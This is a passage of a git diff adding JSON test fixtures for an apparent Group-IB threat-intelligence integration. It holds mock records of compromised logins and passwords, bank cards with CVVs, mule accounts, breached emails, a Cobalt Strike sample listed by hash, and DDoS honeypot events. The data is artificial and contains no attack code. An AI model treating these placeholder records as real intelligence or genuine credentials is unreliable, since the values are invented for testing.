"1111111111111111111111111111111111111111", - "info": { - "authorEmail": "some@email.com", - "authorName": "TEST", - "timestamp": 1611429178 - } - } - ], - "rules": null, - "url": "https://github.com/somegit" - } - ], - "hideForCompanies": [], - "id": "1111111111111111111111111111111111111111", - "ignoreForCompanies": [], - "isFavourite": false, - "isHidden": false, - "isIgnore": false, - "matchesTypes": [], - "name": "https://github.com/somegit", - "numberOf": { - "contributors": 3, - "files": 10 - }, - "relations": { - "infobip.com": "some.com", - "Infobip": "some" - }, - "seqUpdate": 1611862631144674, - "source": "github" - } - ], - 1611862631144674 - ], - "osi/public_leak": [ - [ - { - "bind": [], - "created": "2020-10-05T17:51:31+03:00", - "data": "Pasted at: 05/10/2020 15:45", - "displayOptions": null, - "evaluation": { - "admiraltyCode": "C3", - "credibility": 50, - "reliability": 50, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "hash": "a9a5b5cb9b971a2a037e3a0a30654185ea148095", - "id": "a9a5b5cb9b971a2a037e3a0a30654185ea148095", - "language": "c", - "linkList": [ - { - "author": "whaaaaaat", - "dateDetected": "2020-10-05T17:51:31+03:00", - "datePublished": "2020-10-05T17:45:46+03:00", - "hash": "3066db9f57b7997607208fedc45d7203029d9cb3", - "itemSource": "api", - "link": "https://some.ru", - "sequenceUpdate": null, - "size": 345, - "source": "some.ru", - "status": 1, - "title": "Hashed Email With Exclude" - } - ], - "matches": { - "email": { - "email": [ - "some@gmail.ru" - ] - } - }, - "oldId": null, - "portalLink": "https://bt.group-ib.com/osi/public_leak?searchValue=id:a9a5b5cb9b971a2a037e3a0a30654186ea248094", - "seqUpdate": 1601909532153438, - "size": "345 B", - "updated": "2020-10-05T17:51:31+03:00", - "useful": 1 - } - ], - 1601909532153438 - ], - "malware/targeted_malware": [ - [ - { - "date": "2021-01-21T06:49:12+00:00", - "dateAnalyzeEnded": "2021-01-21T09:53:23+00:00", - "dateAnalyzeStarted": "2021-01-21T09:49:12+00:00", - 
"evaluation": { - "admiraltyCode": "A1", - "credibility": 100, - "reliability": 100, - "severity": "red", - "tlp": "red", - "ttl": null - }, - "fileName": "some.txt", - "fileType": "data", - "fileVersion": null, - "hasReport": true, - "id": "5bbd38acf0b9e4f04123af494d485f6c49221e98", - "injectDump": "saasadasdd", - "injectMd5": "971cca2a0f04ced4crb8218624d88de2", - "isFavourite": false, - "isHidden": false, - "malware": { - "id": "b69fc9d439d2fd41e98a7e3c60b9a55340012eb6", - "name": "Cobalt Strike" - }, - "md5": "11702f92313f5f5123d129809ca4f83d", - "oldId": "396793259", - "portalLink": "https://bt.group-ib.com/targeted_malware/Cobalt Strike/sample/5bbd38acf0b9e4f04123af494d485f6c49221e98/show", - "seqUpdate": 1614920439682, - "sha1": "93fce6228be5557c69d8eeaab5a5a2a643e7d450", - "sha256": "630c88ca1d583f05283707730da5b1f4423807cd80cab108821157ad341b5003", - "size": 208178, - "source": "Sandbox service", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - } - } - ], - 1614920439682 - ], - "compromised/breached": [ - [ - { - "addInfo": { - "address": [ - "" - ] - }, - "email": [ - "some@gmail.com" - ], - "id": [ - "277c4112d348c91f6dabe9467f0d11dd" - ], - "leakName": "some.com", - "password": [ - "CD91C480FDE9D7ACB8AC4B78310EA2ED", - "1390DDDFA28AE085D23518A035707231" - ], - "updateTime": "2021-06-12T03:02:00", - "uploadTime": "2021-06-12T03:02:00" - } - ], - { - "starting_date_from": "2020-01-01", - "page": 0, - "starting_date_to": "2021-01-01", - "current_date_to": "2021-01-01" - } - ], - "bp/domain": [ - [ - { - "id": 14940404, - "ts_create": "2016-07-19 20:04:01", - "ts_update": "2021-01-01 00:35:46", - "attrs": { - "domain": "some.ru", - "date_registered": null, - "date_expired": null, - "tld": "de", - "detection_rate": "0/68", - "name_server": [ - "Server" - ], - "person": "Person", - "address": "Address", - "phone": "Phone", - "organization": null, - "registrar": null, - "page_title": 
"Title", - "email": "some@gmail.com", - "favicon_md5": "38f5f976255a663bced929bb3c252880", - "status": "Status", - "type": "Type", - "server_ip": "11.11.11.11", - "server_ip_asn": "ASN", - "server_ip_city": "City", - "server_ip_country_code": "Code", - "server_ip_country_name": "Country", - "server_ip_provider": "Provider", - "server_ip_region": "Region", - "ip_history": [], - "keywords": [ - "keywords" - ], - "history": [], - "screenshot": "https://bt.group-ib.com/?module=brand_domain_screenshot&action=data&id=14940404", - "html": "https://bt.group-ib.com/?module=brand_domain_html&action=download&id=14940404", - "favicon": "https://bt.group-ib.com/?module=brand_domain_favicon&action=data&id=14940404" - } - } - ], - 3684188313 - ] -} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/main_collections_examples.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/main_collections_examples.json new file mode 100644 index 000000000000..bf873181fd1b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/main_collections_examples.json 
@@ -0,0 +1,11155 @@ +{ + "compromised/account_group":{ + "count": 630118817, + "items": [ + { + "id": "96339c2618783a2ffd3fe3f0e855bc63b4890688", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "examplelogin", + "password": "123456789", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "63b797f8b9924391d6669f55b80bbb43f1a7f285", + "oldId": "6285", + "stixGuid": "1db49a6a-4844-4d80-d2a6-e990a14bcba2", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": "AS1111", + "city": "City", + "region": "Europe", + "provider": "LLC Orange Business Services", + "countryCode": "NL", + "countryName": "Netherlands", + "ip": "1.1.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347005000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + }, + { + "id": "62ecbec64a7c69bebb8894fcef3ac848e74080b1", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "loginexample", + "password": "password123", + 
"parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "26ae9e9017a7ccd6be71640a55976b3e1172c492", + "oldId": "6291", + "stixGuid": "f57e7a34-91a6-567f-fbab-d204cf9e132b", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + "ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": "AS1111", + "city": "City", + "region": "Europe", + "provider": "LLC Orange Business Services", + "countryCode": "NL", + "countryName": "Netherlands", + "ip": "1.1.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347013000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + }, + { + "id": "ba987664a068419d7e6e9ea8988df0e7b38b2f14", + "dateFirstSeen": "2013-05-21T00:00:00+00:00", + "dateLastSeen": "2013-05-21T00:00:00+00:00", + "dateFirstCompromised": null, + "dateLastCompromised": null, + "port": null, + "login": "12345", + "password": "12345", + "parsedLogin": { + "domain": null, + "ip": null + }, + "service": { + "domain": "example.example.com", + "ip": null, + "url": "http://example.example.com/", + "host": "example.example.com" + }, + "events": [ + { + "id": "eabc301dc60356c65ac7256ee1ba528f8422cd33", + "oldId": "6300", + "stixGuid": "3bfaab11-e4f9-49a9-faf8-eb1f029b39a3", + "cnc": { + "cnc": "", + "domain": null, + "ipv4": null, + 
"ipv6": null, + "url": null + }, + "client": { + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": "192.168.0.1" + }, + "ipv6": null + }, + "source": { + "id": "", + "type": "", + "idType": "" + }, + "person": null, + "malware": null, + "threatActor": null, + "dateDetected": "2013-05-21T00:00:00+00:00", + "dateCompromised": null, + "additionalData": null + } + ], + "eventCount": 1, + "silentInsert": null, + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "red", + "ttl": 30 + }, + "seqUpdate": 1450014347019000, + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isFavourite": false + }, + "malware": [], + "threatActor": [], + "source": [], + "sourceType": [], + "sourceId": [] + } + ], + "settings": { + "search": { + "tags": [ + "hr_cnc_country", + "hr_victim_country", + "victim_country", + "victim_ip", + "cnc_ip_country_name", + "service_domain", + "service_domain.tree", + "service_ip", + "login_domain", + "login_domain.tree", + "login_ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "threat_actor", + "malware", + "source", + "source_type", + "severity", + "seqUpdate", + "options", + "few_events", + "ip", + "domain", + "domain.tree", + "id", + "os_family", + "os_details", + "antivirus_software", + "os_architecture", + "system_locale", + "stealer_build", + "probable_corporate_access", + "notification_id" + ], + "fields": [ + "victim_country", + "victim_ip", + "cnc_ip_country_name", + "threat_actor", + "service_domain", + "service_domain.tree", + "service_ip", + "login_domain", + "login_domain.tree", + "login_ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "malware", + "source", + "source_type", + "severity", + "seqUpdate", + "event_count", + "id", + "login", + "email", + "ip", + "domain", + "domain.tree", + "dateFirstCompromised", + "dateLastCompromised", 
+ "host_hwid", + "host_domain", + "host_domain.tree", + "host_pcname", + "host_malware_path" + ], + "sorts": [ + "first_seen", + "last_seen", + "date_first_compromised", + "date_last_compromised", + "seqUpdate" + ] + } + }, + "seqUpdate": 1450014347019000 + }, + "compromised/bank_card_group":{ + "count": 534786, + "items": [ + { + "id": "1a07ffa146409f1ed51675155b54b81a4257a742", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111111", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "240", + "pin": null, + "validThruDate": "2021-09-30", + "validThru": "09/2021" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570125", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + 
"dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147825395, + "stixGuid": "8bd1a0ae-2191-d411-c025-332e37e115ba", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + }, + { + "id": "f4d32fd739748e75d48a3f397536356e0031a1c3", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111110", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": { + "dump": null, + "cvv": "409", + "pin": null, + "validThruDate": "2022-07-31", + "validThru": "07/2022" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + 
"owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570179", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147827461, + "stixGuid": "22a20ce1-72ba-082b-16c3-c2465c613782", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + }, + { + "id": "5b53acb50d9954d5a8f8455400747931568c8ead", + "baseName": null, + "serviceCode": null, + "cardInfo": { + "type": "PERSONAL", + "system": "DISCOVER", + "issuer": { + "countryCode": "US", + "issuer": "DISCOVER BANK" + }, + "number": "1111111111111112", + "bin": [ + "111111" + ] + }, + "events": [ + { + "id": "45ba38d145df986e00a0a1a81814048a87282f2a", + "cardInfo": 
{ + "dump": null, + "cvv": "989", + "pin": null, + "validThruDate": "2022-09-30", + "validThru": "09/2022" + }, + "client": { + "ipv4": null, + "ipv6": null + }, + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": null, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "price": null, + "malware": { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03", + "stixGuid": "475fcc52-ca48-c451-f232-f9b009ac2a73" + }, + "threatActor": { + "name": "VMCARD", + "id": "61b4097bdc7554a0f46279d01eadf016c60c58bc", + "stixGuid": "8e1fa810-d259-5c57-5261-874f5c2b2cdd", + "isAPT": false + }, + "owner": { + "address": null, + "birthday": null, + "countryCode": "US", + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null, + "zip": null + }, + "dateCompromised": "2022-11-10T16:03:00+00:00", + "dateDetected": "2022-11-15T07:20:30+00:00", + "source": { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": null + }, + "isDump": false, + "isExpired": true, + "oldId": "976570208", + "externalId": "", + "track": [] + } + ], + "eventCount": 1, + "dateFirstSeen": "2022-11-15T07:20:30+00:00", + "dateLastSeen": "2022-11-15T07:20:30+00:00", + "dateFirstCompromised": "2022-11-10T16:03:00+00:00", + "dateLastCompromised": "2022-11-10T16:03:00+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "red", + "ttl": 90 + }, + "seqUpdate": 1673147828497, + "stixGuid": "49607d22-648a-39ae-485f-db32b2e3ac96", + "silentInsert": true, + "isMasked": false, + "displayOptions": { + "favouriteForCompanies": [], + "ignoreForCompanies": [], + "hideForCompanies": [], + "isHidden": false, + "isIgnore": false, + "isFavourite": false + }, + "malware": [ + { + "name": "Data Leak", + "id": "eb54701b1b9e46d01505c9e7f6d0214f2a90cf03" + } + ], + "threatActor": [ + { + "name": "VMCARD", + "id": 
"61b4097bdc7554a0f46279d01eadf016c60c58bc" + } + ], + "source": [ + { + "id": "https://anonfiles.com/F5SeMbG0y4/120k_txt", + "type": "Leak", + "idType": "" + } + ], + "sourceId": [ + "https://anonfiles.com/F5SeMbG0y4/120k_txt" + ], + "sourceType": [ + "Leak" + ] + } + ], + "settings": { + "search": { + "tags": [ + "card_system", + "card_type", + "card_issuer", + "malware", + "source_type", + "source", + "owner_country_code", + "is_masked", + "is_dump", + "is_expired", + "company", + "company_id", + "bin", + "severity", + "options", + "has_zip", + "hasnt_filled_zip", + "threat_actor", + "seqUpdate", + "few_events", + "ip", + "domain", + "domain.tree", + "notification_id", + "id" + ], + "fields": [ + "card_system", + "card_type", + "card_issuer", + "malware", + "cybercrime", + "source_type", + "source", + "owner_country_code", + "is_masked", + "is_dump", + "is_expired", + "company", + "company_id", + "threat_actor", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "bin", + "cardInfo.number", + "severity", + "seqUpdate", + "event_count", + "id", + "ip", + "domain", + "domain.tree", + "date_first_compromised", + "date_last_compromised", + "dateFirstCompromised", + "dateLastCompromised" + ], + "sorts": [ + "first_seen", + "last_seen", + "date_first_compromised", + "date_last_compromised", + "seqUpdate" + ] + } + }, + "seqUpdate": 1673147828497 + }, + "compromised/mule":{ + "count": 35251, + "items": [ + { + "id": "5eb9ccb5081203e82ac1159e44747a6af4bb7391", + "account": "4351391043922426", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-08-07T16:00:40+00:00", + "dateIncident": "2015-07-23T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", 
+ "ttl": 30 + }, + "hash": "2a006b1d3bc002c4fb133d6b74bd2f09", + "info": null, + "malware": null, + "oldId": "44453", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "EXAMPLE OOO", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699132268, + "sourceType": null, + "stixGuid": "daae3751-e9d1-210d-cf53-cbb5e76bbaa4", + "threatActor": null, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "7db6ee3515cc1a019b057a32210e1d95090dac88", + "account": "4351391043368307", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-07-20T15:34:03+00:00", + "dateIncident": "2015-07-05T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "e193977ea8efc516319904b340a5901d", + "info": null, + "malware": null, + "oldId": "23398", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "EXAMPLE OOO", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699133282, + "sourceType": null, + "stixGuid": "d1ce6a9a-76c5-fbba-a5db-9b72ac2a97c7", + "threatActor": { + "name": 
"Zolotoe Leto", + "id": "2423e5cadf51f21ab36509377ba7f7d629503298", + "stixGuid": "e0b79cef-8eb0-7768-29a8-112bc66066cf", + "isAPT": false + }, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "92c0c55c48b22e70e4118535dc0a7b63134ec4ad", + "account": "4351391043068758", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-07-20T15:33:41+00:00", + "dateIncident": "2015-07-09T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "69ec671f1666120040d907fdd0cd577f", + "info": null, + "malware": null, + "oldId": "22984", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "EXAMPLE OOO", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699133295, + "sourceType": null, + "stixGuid": "50bc844f-25fe-17ef-b5f3-dc170684e718", + "threatActor": { + "name": "Zolotoe Leto", + "id": "2423e5cadf51f21ab36509377ba7f7d629503298", + "stixGuid": "e0b79cef-8eb0-7768-29a8-112bc66066cf", + "isAPT": false + }, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + } + ], + "settings": { + "search": { + "tags": [ + "id", + "type", + "operator", + "threat_actor", + "malware", + "source", + "severity", + "options", + "seqUpdate", + "cnc_domain", 
+ "cnc_domain.tree", + "cnc_ip", + "notification_id" + ], + "fields": [ + "account", + "type", + "operator", + "threat_actor", + "severity", + "source", + "malware", + "id", + "seqUpdate", + "domain", + "domain.tree", + "ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip" + ], + "sorts": [ + "date_add", + "seqUpdate" + ] + } + }, + "seqUpdate": 1454699133295 + }, + "compromised/breached":{ + "resultId": "3b87b3624d57ef2591f2a926ce25036832c347a3", + "count": 1746463257, + "items": [ + { + "addInfo": { + "emailDomain": [ + "mail.com" + ], + "updateTimestampLong": [ + 1727736313973637 + ] + }, + "description": null, + "downloadLinkList": [], + "email": [ + "example.user.04@mail.com" + ], + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": null + }, + "id": "70b0f7b160866f3a5a351413ce898065", + "leakName": "Email collection", + "leakPublished": "21.09.2024", + "password": [], + "reaperMessageId": null, + "taName": [], + "updateTime": "2024-10-01T01:45:13", + "uploadTime": "2024-10-01T01:45:13" + }, + { + "addInfo": { + "emailDomain": [ + "exampledomain.cz" + ], + "updateTimestampLong": [ + 1727736313995465 + ] + }, + "description": null, + "downloadLinkList": [], + "email": [ + "startuser@exampledomain.cz" + ], + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": null + }, + "id": "b2f3b1500376d13c0a74611dd2c95119", + "leakName": "Email collection", + "leakPublished": "21.09.2024", + "password": [], + "reaperMessageId": null, + "taName": [], + "updateTime": "2024-10-01T01:45:13", + "uploadTime": "2024-10-01T01:45:13" + }, + { + "addInfo": { + "emailDomain": [ + "example.fr" + ], + "updateTimestampLong": [ + 1727736314011414 + ] + }, + "description": null, + "downloadLinkList": [], + "email": [ + "useeeerexample@example.fr" + ], + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + 
"reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": null + }, + "id": "71a122a99b3925ef8b8f225d2ac76fa8", + "leakName": "Email collection", + "leakPublished": "21.09.2024", + "password": [], + "reaperMessageId": null, + "taName": [], + "updateTime": "2024-10-01T01:45:14", + "uploadTime": "2024-10-01T01:45:14" + } + ] + }, + "attacks/ddos":{ + "count": 44739317, + "items": [ + { + "id": "7927ec532db08b2e420b33cff2a9068ca8487e76", + "cnc": { + "cnc": "6lxdx.s3.amazonaws.com", + "port": null, + "domain": "6lxdx.s3.amazonaws.com", + "ipv4": null, + "ipv6": null, + "url": "http://6lxdx.s3.amazonaws.com" + }, + "dateBegin": "2019-10-23T05:34:25+00:00", + "dateEnd": "2019-10-23T05:35:16+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192868705", + "duration": 51, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11054565", + "stixGuid": "9232056c-0c7d-21a7-ac4f-a7fa243adc57", + "target": { + "ipv4": { + "asn": null, + "city": "Fairfield", + "region": "Connecticut", + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "3.15.14.164" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "695e81a7379155c4c3da31056675a3f2073dd931", + "cnc": { + "cnc": "6lmqc.s3.amazonaws.com", + "port": null, + "domain": "6lmqc.s3.amazonaws.com", + "ipv4": null, + "ipv6": null, + "url": "http://6lmqc.s3.amazonaws.com" + }, + "dateBegin": "2019-10-23T05:34:25+00:00", + "dateEnd": 
"2019-10-23T05:35:16+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192868443", + "duration": 51, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11058245", + "stixGuid": "6f0a316c-1c50-455b-b9e6-633aa24f7498", + "target": { + "ipv4": { + "asn": null, + "city": "Fairfield", + "region": "Connecticut", + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "3.15.14.164" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "c5202c7177455777c702529a72a0f5a613c2c58a", + "cnc": { + "cnc": "plk4l.s3.amazonaws.co", + "port": null, + "domain": "plk4l.s3.amazonaws.co", + "ipv4": null, + "ipv6": null, + "url": "http://plk4l.s3.amazonaws.co" + }, + "dateBegin": 